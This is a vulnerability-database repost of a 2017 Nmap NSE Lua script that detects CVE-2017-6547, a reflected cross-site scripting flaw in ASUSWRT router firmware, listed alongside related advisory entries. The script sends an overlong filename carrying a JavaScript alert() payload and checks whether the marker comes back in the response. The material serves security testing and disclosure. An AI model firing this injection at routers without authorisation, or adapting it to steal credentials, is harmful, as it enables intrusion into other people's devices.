ASUS WRT Cross Site Scripting Nmap NSE Script

🗓️ 07 Apr 2017 00:00:00Reported by Rewanth CoolType

packetstorm🔗 packetstormsecurity.com👁 67 Views

ASUSWRT Wireless Router XSS Vulnerabilit

Reporter	Title	Published	Views	Family All 10
CVE	CVE-2017-6547	9 Mar 201709:26	–	cve
Cvelist	CVE-2017-6547	9 Mar 201709:26	–	cvelist
Exploit DB	ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Cross-Site Scripting	8 Mar 201700:00	–	exploitdb
EUVD	EUVD-2017-15603	7 Oct 202500:30	–	euvd
exploitpack	ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Cross-Site Scripting	8 Mar 201700:00	–	exploitpack
NVD	CVE-2017-6547	9 Mar 201709:59	–	nvd
OSV	CVE-2017-6547	9 Mar 201709:59	–	osv
Prion	Cross site scripting	9 Mar 201709:59	–	prion
Symantec	SA148: Linux Kernel Vulnerabilities Feb-Apr 2017	9 May 201708:00	–	symantec
seebug.org	ASUSWRT - Multiple Vulnerabilities	10 Mar 201700:00	–	seebug

`local http = require "http"  
local shortport = require "shortport"  
local stdnse = require "stdnse"  
local string = require "string"  
local vulns = require "vulns"  
local nmap = require "nmap"  
  
description = [[  
ASUSWRT is a wireless router operating system that powers many routers produced by ASUS.  
Cross-site scripting (XSS) vulnerability in httpd in ASUS ASUSWRT  
on RT-AC53 3.0.0.4.380.6038 devices allows remote attackersto inject arbitrary  
JavaScript by requesting filenames longer than 50 characters.  
Attackers can exploit these issues to execute arbitrary code in the context  
of the user running the affected application or steal cookie-based authentication  
credentials and gain unauthorized access.  
Failed exploit attempts will likely cause denial-of-service conditions.  
NOTE: This vulnerability is yet to be patched by the vendors.  
]]  
  
---  
-- @usage  
-- nmap --script http-asuswrt-xss <ip>  
--  
-- @args  
-- http-asuswrt-xss.uri  
-- Default: '/' (Preferred)  
--  
-- @output  
-- PORT STATE SERVICE  
-- 80/tcp open http  
-- | http-asuswrt-xss  
-- | VULNERABLE:  
-- | XSS  
-- | State: VULNERABLE (Exploitable)  
-- | IDs:  
-- | CVE: CVE-2017-6547  
-- | Cross-site scripting (XSS) vulnerability in httpd in ASUS ASUSWRT  
-- | on RT-AC53 3.0.0.4.380.6038 devices allows remote attackersto inject arbitrary  
-- | JavaScript by requesting filenames longer than 50 characters.  
-- |  
-- | NOTE: This vulnerability is yet to be patched by the vendors.  
-- |  
-- | References:  
-- | http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-6547  
--  
---  
  
author = "Rewanth Cool"  
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"  
categories = {"vuln", "intrusive", "exploit", "dos"}  
  
portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open")  
  
action = function(host, port)  
local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/"  
  
local payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';alert('nmapXSSasuswrtScanner');'A"  
local pattern = "nmapXSSasuswrtScanner"  
  
-- Exploiting the vulnerability  
local response = http.get( host, port, uri..payload )  
  
if( response.status == 200 ) then  
local vulnReport = vulns.Report:new(SCRIPT_NAME, host, port)  
local vuln = {  
title = "Cross-site scripting (XSS) vulnerability in httpd in ASUS ASUSWRT",  
state = vulns.STATE.NOT_VULN,  
description = [[  
Cross-site scripting (XSS) vulnerability in httpd in ASUS ASUSWRT  
on RT-AC53 3.0.0.4.380.6038 devices allows remote attackersto inject arbitrary  
JavaScript by requesting filenames longer than 50 characters.  
NOTE: This vulnerability is yet to be patched by the vendors.  
]],  
IDS = {  
CVE = "CVE-2017-6547",  
references = {  
"http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-6547"  
},  
dates = {  
disclosure = {  
year = "2017",  
month = "03",  
day = "08"  
},  
}  
}  
}  
  
if( string.match(response.body, pattern) ) then  
vuln.state = vulns.STATE.EXPLOIT  
vuln.exploit_results = payload  
return vulnReport:make_output(vuln)  
end  
end  
end  
`

07 Apr 2017 00:00Current

6.6Medium risk

Vulners AI Score6.6

EPSS0.01043